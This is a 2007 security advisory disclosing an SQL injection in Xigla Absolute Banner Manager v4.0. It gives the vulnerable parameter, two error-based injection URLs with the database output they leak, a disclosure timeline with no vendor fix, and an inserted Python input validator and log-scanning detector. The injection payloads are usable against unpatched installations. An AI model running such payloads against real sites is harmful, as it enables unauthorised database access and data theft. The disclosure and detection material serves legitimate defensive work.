
xigla-sql.txt

Date: 08 Dec 2007
Reported by: Joseph Pierini
Type: packetstorm
Source: packetstormsecurity.com

Xigla Absolute Banner Manager v4.0 SQL Injection Vulnerability. Major impact on confidentiality, integrity, and availability.

Code

HackerSafe Labs - Security Advisory
  
http://www.hackersafelabs.com/
  
Date: 12/06/2007  
Vendor: http://www.xigla.com
Package: Xigla Absolute Banner Manager   
Versions: v4.0   
Credit: Joseph Pierini - HackerSafe Labs  
  
Risk:   
Related Exploit Range: Remote   
Attack Complexity: Medium   
Level of Authentication Needed: Not Required   
Confidentiality Impact: Major   
Integrity Impact: Major   
Availability Impact: Major   
  
Overview:   
Absolute Banner Manager .NET is a feature-packed ad tracking and banner management application developed for webmasters who need a scalable, flexible and reliable banner ad serving front-end tool.
  
Vulnerabilities:   
A SQL injection exists in the Windows version of the Xigla Absolute  
Banner Manager application.   
  
SQL Injection Page: "abm.aspx"   
SQL Injection Parameter: "z="   
  
Examples:

http://www.domainname.com/absolutebm/abm.aspx?z=@@version

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int.

http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(int,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20where%20xtype=char(85)))

Syntax error converting the varchar value 'dtproperties' to a column of data type int.
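Added illustration from the defender's side, not part of the advisory: the handler-side check the z parameter should have had (a banner id is an integer, so anything else is rejected before it reaches SQL Server) and a scan over IIS-style access log lines that flags non-numeric z values sent to abm.aspx, listing the T-SQL constructs they contain for triage. The log lines, the field layout and the marker list are constructed assumptions, not Xigla's or ScanAlert's data.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (assumption, not from the advisory).
# Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-12-06 10:00:01 GET /absolutebm/abm.aspx z=17 200
2007-12-06 10:00:05 GET /absolutebm/abm.aspx z=@@version 500
2007-12-06 10:00:09 GET /absolutebm/abm.aspx z=1))%20and%201=convert(int,(select%20top%201%20convert(varchar,name)%20from%20sysobjects%20where%20xtype=char(85))) 500
2007-12-06 10:00:12 GET /absolutebm/images/banner.gif - 200
"""

# T-SQL constructs that appear in the advisory's error-based probes (assumed list).
SQL_MARKERS = re.compile(
    r"@@\w+|\bconvert\s*\(|\bselect\b|\bsysobjects\b|\bchar\s*\(|'|;|--",
    re.IGNORECASE,
)


def validate_z(value: str):
    """The check abm.aspx should apply: z is a banner id, so only a plain
    integer is accepted; None means the handler must reject the request."""
    value = value.strip()
    return int(value) if re.fullmatch(r"\d+", value) else None


def scan_iis_log(text: str) -> list:
    """Return one finding per abm.aspx request whose decoded z is not an
    integer, with the SQL constructs found in it."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 6:
            continue
        date, time, _method, stem, query, status = parts[:6]
        if not stem.lower().endswith("/abm.aspx") or query == "-":
            continue
        # parse_qs percent-decodes values, so %20 and friends are resolved.
        for z in parse_qs(query, keep_blank_values=True).get("z", []):
            if validate_z(z) is None:
                markers = sorted({m.lower() for m in SQL_MARKERS.findall(z)})
                findings.append({"time": f"{date} {time}", "status": status,
                                 "z": z, "markers": markers})
    return findings


if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```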
  
Resolution Timeline:   
  
Vendor Notification: October 29, 2007: [email protected]
Vendor Response: None   
Vendor Fix: None   
Public release of advisory: December 6, 2007   
  
ScanAlert Responsible Disclosure Policy

ScanAlert believes in the responsible disclosure of vulnerability information with a coordinated release with the vendor where possible. Except where active and/or trivial exploitation of the vulnerability is present, ScanAlert believes it is in the best interest of the community when the vendor participates in the process of disclosure and has sufficient time to respond effectively. If ScanAlert exhausts all reasonable means in order to contact a vendor, then ScanAlert may issue a public advisory disclosing its findings 15 business days after the initial contact.

ScanAlert's mission is to make the web safe from hackers.

We make web sites secure from hackers and certify it to their customers via our patent-pending HACKER SAFE(r) security certification technology. Our daily security audits and real-time certification enable consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions.
  
Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert (www.scanalert.com)
[email protected]
877-302-9965 ext 1185
